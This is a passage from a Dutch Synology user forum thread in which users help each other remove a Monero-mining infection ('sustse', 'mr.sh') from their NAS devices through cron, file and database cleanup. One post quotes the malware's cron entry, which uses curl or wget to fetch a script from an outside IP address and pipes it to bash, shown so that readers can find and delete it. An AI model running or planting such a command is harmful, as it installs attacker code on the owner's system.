Auteur Topic: Process 'sustse' gebruikt volledige processor  (gelezen 1947 keer)

Offline eaz

  • Bedankjes
  • -Gegeven: 0
  • -Ontvangen: 4
  • Berichten: 39
Re: Process 'sustse' gebruikt volledige processor
« Reactie #30 Gepost op: 15 juni 2019, 14:54:50 »
hier nog een detail-analyse:

http://udurrani.com/0fff/monero_mining.pdf
  • Mijn Synology: DS415+
  • HDD's: 2xssd 480Gb, 2x 4TB
  • Extra's: 8GB

Offline mbomhof

  • Bedankjes
  • -Gegeven: 1
  • -Ontvangen: 4
  • Berichten: 12
Re: Process 'sustse' gebruikt volledige processor
« Reactie #31 Gepost op: 15 juni 2019, 15:17:08 »
Samen met mijn zwager nog wat tijd aan gespendeerd...

Vooralsnog lijkt het er op dat ik hem volledig kwijt ben.
Geen piekbelasting meer op de processor, geen actieve processen inzake 'mr.sh' en/of 'sustse'.

Er blijken ook mr.sh regels in de database van Domoticz te staan.
Die heb ik ook verwijderd middels een database editor.

Op deze manier heb ik alles kunnen opschonen:


Domoticz:
Open domoticz en maak een backup van de database via 'Instellingen --> Instellingen --> Backup/Herstel --> Backup database'.
Middels een database edit tool de database openen, ik heb hiervoor 'DB Browser for SQLite' gebruikt.
https://sqlitebrowser.org/dl/

Open de database file die je hebt opgeslagen.
Op het tabblad 'Browse Data' kun je de tabel 'CustomImages' openen.
Hier zal je een regel in zien staan die ook mr.sh bevat.
Verwijder de regel middels 'Rechtsklik --> Delete Record'.
Sla de wijzigingen op middels de 'Write Changes' knop.
Lees de aanpassing in Domoticz in via 'Instellingen --> Instellingen --> Backup/Herstel --> Database herstellen'.
Herstart Domoticz.

Indien je Domoticz nog niet hebt bijgewerkt naar de laatste versie is dit direct de mogelijkheid dat te doen en het 'lek' te dichten.
http://www.jadahl.com/


NAS:
Log in op de NAS middels ssh.

Middels de 'vi' editor kunnen de verschillende regels uit de cron bestanden verwijderd worden.
('sudo' voor het openen van de editor met root rechten).
Voer de onderstaande regels uit.
Na het uitvoeren van 1 regel, opent een editor waar de je regel inzake mr.sh zou moeten zien.
(Zoiets: */1 * * * * root (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh)
Middels de delete knop de regel verwijderen.
Bestand opslaan door ':w' en 'enter'.
vi editor sluiten door ':q' en 'enter'.
Herhaal voor alle 4 bestanden.

sudo vi /etc/cron.d/apache
sudo vi /etc/cron.d/root
sudo vi /var/spool/cron/root
sudo vi /var/spool/cron/crontabs/root

Vervolgens de verschillende aangemaakte bestanden verwijderen met de volgende commando's:

sudo rm /etc/cron.hourly/oanacroner1
sudo rm /var/tmp/sustse
sudo rm /var/tmp/wc.conf

Voor de zekerheid de NAS herstarten!

Let op, als één van de bestanden weer uitgevoerd wordt als je nog niet alles hebt aangepast, kun je opnieuw beginnen.
Misschien de internet verbinding tijdelijk verbreken of net als ik in de firewall het ip adres blokkeren, zodat het script niet succesvol uitgevoerd kan worden.


Voorlopig blijf ik de NAS monitoren om te kijken of er nog wat gebeurt.
Ook heb ik het IP adres nog steeds geblokkeerd in mijn firewall.
Als de NAS stabiel blijft zonder tekenen van sustse en/of mr.sh, ga ik ook de regel uit de firewall halen om te kijken of het terug komt.
  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline Henk Havelaar

  • Bedankjes
  • -Gegeven: 5
  • -Ontvangen: 2
  • Berichten: 44
Re: Process 'sustse' gebruikt volledige processor
« Reactie #32 Gepost op: 16 juni 2019, 17:10:47 »
@mbomhof, bedankt voor dit uitzoek werk maar als Linux leek heb ik wat vragen.
Ik heb SSH en admin geactiveerd is de NAS en op mijn remote PC Putty gedownload en geïnstalleerd, port geforward in de router etc. Met Putty kan ik inloggen via SSH in de NAS, tot zover geen probleem. (NAS staat in Nederland, ik ben in Portugal).
Als ik de eerste regel sudo vi /etc/cron.d/apache invoer dan wordt er weer naar een paswoord gevraagd, dat geef ik in en de enige regel die verschijnt is gelijk de goede met daaronder een aantal blanco regels die beginnen met blauwe~, de tekstregel kan ik weghalen met de delete toets maar dan komt het. Wat ik ook probeer, alles wat ik invoer zoals w of -q werkt neit, heb jij enig idee wat ik verkeerd doe?
  • Mijn Synology: DS918+/DX5
  • HDD's: 9 x WD red 10TB
  • Extra's: 4 GB/2 x SSD 500GB
Main NAS: DS918+/DX517 met 9 x WD Red 10 TB, extern 2 x Sharkoon 5 bay Raidstation met 10 x WD Red 4 TB (USB 3)
Documenten NAS: DS508 met 5 x WD Red 2 TB

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 958
  • -Ontvangen: 5240
  • Berichten: 31.285
  • Synology is awesome.
    • Synology Support
Re: Process 'sustse' gebruikt volledige processor
« Reactie #33 Gepost op: 16 juni 2019, 17:16:42 »
Eerst de <esc> toets indrukken dan :wq en <enter>
Veel mensen weten veel, maar niemand weet alles.


CS406     2 x HDS721075KLA330 DSM 2.0-0731       [ARCHIEF OPSLAG]
          ST3750640AS HD753LJ
DS107+    HDS722020ALA330     DSM 3.1-1639       [ARCHIEF OPSLAG]
DS111     WD40EZRZ            DSM 6.1.7-15284-3  [ARCHIEF OPSLAG]
DS411slim Wisselende HD's     DSM 6.2.1-23824-1  [SPEELTJE]
DS411+II  4 x HDS724040ALE640 DSM 6.1.7-15284-3  [PROD]
DS413j    4 x WD20EARX        DSM 6.1.7-15284-3  [BACKUP]
DS716+II  2 x DT01ACA050      DSM 6.2.2-24922-2  [TEST]
RT2600ac                      SRM 1.2.2-7915     [PROD]
MR2200ac                      SRM 1.2.2-7915     [PROD]

Offline Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 106
  • -Ontvangen: 1622
  • Berichten: 10.746
Re: Process 'sustse' gebruikt volledige processor
« Reactie #34 Gepost op: 16 juni 2019, 17:59:49 »
…Ik heb SSH en admin geactiveerd … port geforward in de router etc.…

Ik weet niet welke poorten, maar dat is:

1e niet nodig
2e zeer gevaarlijk als dat poort 22 is.
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 958
  • -Ontvangen: 5240
  • Berichten: 31.285
  • Synology is awesome.
    • Synology Support
Re: Process 'sustse' gebruikt volledige processor
« Reactie #35 Gepost op: 16 juni 2019, 18:08:29 »
Hij werkt op afstand, tenzij VPN gebruikt wordt, dan is het idd niet nodig.
Veel mensen weten veel, maar niemand weet alles.


CS406     2 x HDS721075KLA330 DSM 2.0-0731       [ARCHIEF OPSLAG]
          ST3750640AS HD753LJ
DS107+    HDS722020ALA330     DSM 3.1-1639       [ARCHIEF OPSLAG]
DS111     WD40EZRZ            DSM 6.1.7-15284-3  [ARCHIEF OPSLAG]
DS411slim Wisselende HD's     DSM 6.2.1-23824-1  [SPEELTJE]
DS411+II  4 x HDS724040ALE640 DSM 6.1.7-15284-3  [PROD]
DS413j    4 x WD20EARX        DSM 6.1.7-15284-3  [BACKUP]
DS716+II  2 x DT01ACA050      DSM 6.2.2-24922-2  [TEST]
RT2600ac                      SRM 1.2.2-7915     [PROD]
MR2200ac                      SRM 1.2.2-7915     [PROD]

Offline mbomhof

  • Bedankjes
  • -Gegeven: 1
  • -Ontvangen: 4
  • Berichten: 12
Re: Process 'sustse' gebruikt volledige processor
« Reactie #36 Gepost op: 16 juni 2019, 18:12:54 »

Ik weet niet welke poorten, maar dat is:

1e niet nodig
2e zeer gevaarlijk als dat poort 22 is.

Inderdaad snel weer dicht zetten als je het niet meer nodig hebt!
Of liever nog alleen via een VPN of iets dergelijks gebruiken en helemaal niet naar het internet open!

Als ik de eerste regel sudo vi /etc/cron.d/apache invoer dan wordt er weer naar een paswoord gevraagd,

Dit komt omdat je met het 'sudo' commando de editor opent als 'root', hiervoor dus nogmaals een wachtwoord invoeren.

Wat ik ook probeer, alles wat ik invoer zoals w of -q werkt neit,

Zoals Birdy terecht aan geeft, mogelijk zit je in de editor modus.
Deze verlaten met <esc>.
Vervolgens :wq intypen (verschijnt onderin het scherm als het goed is) en sluiten met <enter>.

Eerst de <esc> toets indrukken dan :wq en <enter>
  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline Henk Havelaar

  • Bedankjes
  • -Gegeven: 5
  • -Ontvangen: 2
  • Berichten: 44
Re: Process 'sustse' gebruikt volledige processor
« Reactie #37 Gepost op: 16 juni 2019, 18:22:12 »


Ik weet niet welke poorten, maar dat is:

1e niet nodig
2e zeer gevaarlijk als dat poort 22 is.
[/quote]

Dat zal wel moeten, ik ben nu in Portugal en de NAS draait in Nederland. Gelukkig heb ik in NL ook een PC'tje draaien waarmee ik via VNC de router kan aanpassen.

Birdy, ook bedankt.
  • Mijn Synology: DS918+/DX5
  • HDD's: 9 x WD red 10TB
  • Extra's: 4 GB/2 x SSD 500GB
Main NAS: DS918+/DX517 met 9 x WD Red 10 TB, extern 2 x Sharkoon 5 bay Raidstation met 10 x WD Red 4 TB (USB 3)
Documenten NAS: DS508 met 5 x WD Red 2 TB

Offline Henk Havelaar

  • Bedankjes
  • -Gegeven: 5
  • -Ontvangen: 2
  • Berichten: 44
Re: Process 'sustse' gebruikt volledige processor
« Reactie #38 Gepost op: 16 juni 2019, 18:36:23 »
Ik weet niet wat ik verkeerd doe maar er gebeurd niets behalve het foutmeldings toontje van WIndows. In de bijlage het scherm nadat ik alles van de regel heb verwijderd
  • Mijn Synology: DS918+/DX5
  • HDD's: 9 x WD red 10TB
  • Extra's: 4 GB/2 x SSD 500GB
Main NAS: DS918+/DX517 met 9 x WD Red 10 TB, extern 2 x Sharkoon 5 bay Raidstation met 10 x WD Red 4 TB (USB 3)
Documenten NAS: DS508 met 5 x WD Red 2 TB

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 958
  • -Ontvangen: 5240
  • Berichten: 31.285
  • Synology is awesome.
    • Synology Support
Re: Process 'sustse' gebruikt volledige processor
« Reactie #39 Gepost op: 16 juni 2019, 19:09:44 »
<esc>
:wq
Veel mensen weten veel, maar niemand weet alles.


CS406     2 x HDS721075KLA330 DSM 2.0-0731       [ARCHIEF OPSLAG]
          ST3750640AS HD753LJ
DS107+    HDS722020ALA330     DSM 3.1-1639       [ARCHIEF OPSLAG]
DS111     WD40EZRZ            DSM 6.1.7-15284-3  [ARCHIEF OPSLAG]
DS411slim Wisselende HD's     DSM 6.2.1-23824-1  [SPEELTJE]
DS411+II  4 x HDS724040ALE640 DSM 6.1.7-15284-3  [PROD]
DS413j    4 x WD20EARX        DSM 6.1.7-15284-3  [BACKUP]
DS716+II  2 x DT01ACA050      DSM 6.2.2-24922-2  [TEST]
RT2600ac                      SRM 1.2.2-7915     [PROD]
MR2200ac                      SRM 1.2.2-7915     [PROD]

Offline Henk Havelaar

  • Bedankjes
  • -Gegeven: 5
  • -Ontvangen: 2
  • Berichten: 44
Re: Process 'sustse' gebruikt volledige processor
« Reactie #40 Gepost op: 16 juni 2019, 20:40:03 »
Bedankt allemaal, het aanpassen lukt nu maar ik kan het niet snel genoeg doen, als ik de laatste wijzig is de eerste al weer aangepast.
Ik zal het thuis moeten doen zodat ik de internet verbinding met de NAS kan weghalen.
  • Mijn Synology: DS918+/DX5
  • HDD's: 9 x WD red 10TB
  • Extra's: 4 GB/2 x SSD 500GB
Main NAS: DS918+/DX517 met 9 x WD Red 10 TB, extern 2 x Sharkoon 5 bay Raidstation met 10 x WD Red 4 TB (USB 3)
Documenten NAS: DS508 met 5 x WD Red 2 TB

Offline mc_

  • Bedankjes
  • -Gegeven: 6
  • -Ontvangen: 6
  • Berichten: 110
Re: Process 'sustse' gebruikt volledige processor
« Reactie #41 Gepost op: 16 juni 2019, 22:09:36 »
De genoemde bestanden zijn bij mij allemaal leeg, dus ik heb de volledige bestanden verwijderd. Mochten ze ooit weer nodig zijn, dan lijkt het me dat ze wel weer aangemaakt worden. En anders is dat handmatig snel gedaan.
  • Mijn Synology: DS414
  • HDD's: 4xWD40EFRX

Offline Henk Havelaar

  • Bedankjes
  • -Gegeven: 5
  • -Ontvangen: 2
  • Berichten: 44
Re: Process 'sustse' gebruikt volledige processor
« Reactie #42 Gepost op: 17 juni 2019, 10:31:52 »
@mc, bedankt! Dat is een goede tip, ik heb nu alle bestanden verwijderd en dat was snel genoeg. Gisteravond de bestanden verwijderd, NAS opnieuw gestart en zo te zien is er niets terug gekomen, CPU belasting is nu steeds iddle rond de 8% en het proces sutste is niet meer aanwezig in de taakplanner.
Hopelijk komt het ook niet meer terug.

@mbomhof, bij jou alles ook nog rustig??
  • Mijn Synology: DS918+/DX5
  • HDD's: 9 x WD red 10TB
  • Extra's: 4 GB/2 x SSD 500GB
Main NAS: DS918+/DX517 met 9 x WD Red 10 TB, extern 2 x Sharkoon 5 bay Raidstation met 10 x WD Red 4 TB (USB 3)
Documenten NAS: DS508 met 5 x WD Red 2 TB

Offline mbomhof

  • Bedankjes
  • -Gegeven: 1
  • -Ontvangen: 4
  • Berichten: 12
Re: Process 'sustse' gebruikt volledige processor
« Reactie #43 Gepost op: 17 juni 2019, 15:20:59 »
@Henk Havelaar, hier is alles inderdaad nog rustig.
Geen gekke dingen meer tegen gekomen.
Ook het IP adres in de firewall weer vrij gegeven.
  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline Henk Havelaar

  • Bedankjes
  • -Gegeven: 5
  • -Ontvangen: 2
  • Berichten: 44
Re: Process 'sustse' gebruikt volledige processor
« Reactie #44 Gepost op: 17 juni 2019, 21:11:53 »
Virusscan werkt nu ook weer, zie het resultaat. Hopelijk is de rommel nu echt verwijderd.
  • Mijn Synology: DS918+/DX5
  • HDD's: 9 x WD red 10TB
  • Extra's: 4 GB/2 x SSD 500GB
Main NAS: DS918+/DX517 met 9 x WD Red 10 TB, extern 2 x Sharkoon 5 bay Raidstation met 10 x WD Red 4 TB (USB 3)
Documenten NAS: DS508 met 5 x WD Red 2 TB


 

Schijf bijna vol....maar heb maar 40% gebruikt!

Gestart door weddjeBoard Cloud Station & Drive

Reacties: 6
Gelezen: 1606
Laatste bericht 03 mei 2017, 16:21:49
door Birdy
Cloud Station gebruikt voor overzetten maar veel meer data op het doel station

Gestart door nobassBoard NAS hardware vragen

Reacties: 12
Gelezen: 3219
Laatste bericht 22 juni 2015, 15:34:15
door Birdy
Photostation openen via DSM geeft "gebruikt een niet ondersteund protocol"

Gestart door SPiETBoard Photo Station / Blog

Reacties: 3
Gelezen: 728
Laatste bericht 13 december 2018, 13:48:26
door SPiET
Nas benaderen via internet, verschillende manieren, welke wordt meest gebruikt?

Gestart door JozefBoard DDNS / Quick Connect / EZ-Internet / Portforwarding

Reacties: 3
Gelezen: 27101
Laatste bericht 31 juli 2013, 13:30:07
door thecell
FTP connectie verbreekt wanneer passive port 55544 wordt gebruikt

Gestart door nico_van_wijkBoard FTP, NFS and Samba Server

Reacties: 2
Gelezen: 1251
Laatste bericht 10 januari 2014, 15:39:04
door Birdy
Synology-Forum.nl is een Nederlands gebruikersforum en staat volledig los van het merk Synology. Lees onze privacyverklaring.